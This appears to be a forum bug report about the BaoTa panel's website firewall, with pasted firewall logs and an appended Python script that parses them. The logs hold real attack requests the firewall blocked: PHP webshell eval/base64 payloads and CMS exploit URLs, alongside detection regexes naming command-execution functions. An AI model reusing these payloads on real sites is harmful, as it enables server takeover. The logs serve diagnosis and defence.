
[Bug report] BaoTa website firewall anomaly

Posted in Linux Panel, 2018-8-20 22:42


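VIP, one-year Professional edition.
When I first installed the firewall it worked very well. A few days ago I manually deleted all the files under /www/wwwlogs on the server; since then the backend statistics show several attack-type entries, but the detailed information cannot be viewed.

However, there are records in the btwaf directory under the logs. I don't know how to fix this; please provide technical guidance. If the boss can solve this, I will write up the detailed solution steps in this thread for other beginners to learn from.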
Posted on 2018-8-20 22:45:54
["2018-08-20 21:51:11","216.172.153.202","GET","\/index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A}","Opera\/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto\/2.9.168 Version\/11.52","args","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> wd:{if-A:assert($_POST[a])}{endif-A}"]
["2018-08-20 21:52:13","216.172.153.202","GET","\/email\/shell.php","Mozilla\/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident\/4.0; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)","url","\/(hack|shell|spy|phpspy)\\.php$ >> 1:\/email\/shell.php"]
["2018-08-20 22:21:45","61.160.215.50","POST","\/\/plus\/mytag_js.php?aid=9090","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","post","base64_decode\\( >> guige:@eval\u0001(base64_decode($_POST[z0]));"]
["2018-08-20 22:21:45","61.160.215.50","POST","\/\/user\/niubi.php","Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)","post","base64_decode\\( >> lequ:@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();"]
["2018-08-20 22:21:46","61.160.215.50","POST","\/\/utility\/convert\/data\/config.inc.php","Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)","post","base64_decode\\( >> tom:@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();"]
["2018-08-20 22:21:46","61.160.215.50","GET","\/\/uploads\/dede\/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_POST[lequ]);die();\/\/","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","args","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|char|chr|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> refiles[1]:\\";eval($_POST[lequ]);die();\/\/"]
["2018-08-20 22:21:46","61.160.215.50","POST","\/\/uploads\/dede\/sys_verifies.php?action=down","Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)","post","base64_decode\\( >> lequ:@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();"]
["2018-08-20 22:21:46","61.160.215.50","GET","\/\/web\/new\/fenlei\/search.php?mid=1&action=search&keyword=asd&postdb[city_id]=..\/..\/admin\/hack&hack=jfadmin&action=addjf&Apower[jfadmin_mod]=1&fid=1&title=${eval($_POST[lequ])}","Mozilla\/4.0 (compatible; MSIE 9.0; Windows NT 6.1)","args","\\$\\{ >> title:${eval($_POST[lequ])}"]
["2018-08-20 22:21:46","61.160.215.50","POST","\/\/web\/new\/fenlei\/do\/jf.php","Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)","post","base64_decode\\( >> lequ:@session_start();$_SESSION[chr(90)]=$_POST[chr(124)];@eval(base64_decode($_SESSION[chr(90)]));die();"]
["2018-08-20 22:21:46","61.160.215.50","POST","\/\/web\/new\/fenlei\/do\/jf.php","Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0)","post","60秒以内累计超过6次以上非法请求,封锁180秒"]
["2018-08-20 22:35:55","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:35:55","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:36:06","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:36:06","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:36:48","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:36:48","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:38:33","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:38:33","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:38:34","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:38:34","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:38:37","223.104.10.111","GET","\/index.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:38:37","223.104.10.111","GET","\/favicon.ico","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:38:46","223.104.10.111","GET","\/forum.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|") >> 1:mal9_2132_saltkey=u3y003yw; mal9_2132_lastvisit=1532621845; _fmdata=or%2bx9qwdihsyqsfyh50a8bznl2d3cdtvn4sulpylysjo%2foemxpfks2hbdy3nwmmlzmi%2bxhkju4zegwspsarzf2adxtmuwxzwct6hlb6fffo%3d"]
["2018-08-20 22:38:46","223.104.10.111","GET","\/forum.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/68.0.3440.106 Safari\/537.36","cookie","60秒以内累计超过6次以上非法请求,封锁180秒"]
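An added example (not part of the original posts and not BaoTa's own code): a small Python reader for log lines of the shape posted above, which separates rule hits from ban notices and reports which substring of the logged value each rule matched, so the records can be reviewed without the panel view. The field names, URL-decoding of the value before matching, and case-insensitive matching are assumptions; the sample lines are constructed.

```python
import json
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Assumptions: field names are inferred from the posted lines; SAMPLE is constructed
# in the same shape (documentation IPs), with the last line deliberately truncated.
FIELDS = ("time", "ip", "method", "uri", "user_agent", "zone", "detail")
SAMPLE = r'''
["2018-08-20 22:21:45","203.0.113.7","POST","\/a.php","UA-1","post","base64_decode\\( >> k:x=base64_decode(y)"]
["2018-08-20 22:21:46","203.0.113.7","POST","\/a.php","UA-1","post","60秒以内累计超过6次以上非法请求,封锁180秒"]
["2018-08-20 22:35:55","198.51.100.9","GET","\/index.php","UA-2","cookie","\\b(or|xor|and)\\b.*(=|<|>|'|\") >> 1:sid=abc; tok=or%2bq9x%3d"]
["2018-08-20 22:36:06","198.51.100.9","GET","\/index.php","UA-2","cookie
'''

def parse_line(line):
    """Return a dict for one log line, or None if it is not a 7-element JSON array."""
    try:
        row = json.loads(line)
    except ValueError:
        row = None
    if not isinstance(row, list) or len(row) != len(FIELDS):
        return None
    # A rule hit is "<regex> >> <param>:<value>"; anything else is an action notice.
    rule, sep, matched = str(row[6]).partition(" >> ")
    param, _, value = matched.partition(":")
    return dict(zip(FIELDS, row), rule=rule if sep else None, param=param, value=value)

def trigger(rec):
    """Substring of the URL-decoded value that the logged rule matches, else None."""
    try:
        m = re.search(rec["rule"], unquote(rec["value"]), re.I) if rec["rule"] else None
    except re.error:  # rule uses syntax Python's re does not accept
        return None
    return m.group(0) if m else None

def summarize(text):
    """Per source IP: hit counts by (zone, rule) and ban notices; plus bad-line count."""
    per_ip, bad = defaultdict(lambda: {"hits": Counter(), "notices": []}), 0
    for line in filter(None, map(str.strip, text.splitlines())):
        rec = parse_line(line)
        if rec is None:
            bad += 1
        elif rec["rule"]:
            per_ip[rec["ip"]]["hits"][rec["zone"], rec["rule"]] += 1
        else:
            per_ip[rec["ip"]]["notices"].append(rec["detail"])
    return dict(per_ip), bad

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

Calling `trigger()` on a cookie-zone record returns the exact text the rule latched onto, which is the detail needed to decide whether a repeated hit from one client is a probe or the rule matching ordinary cookie data.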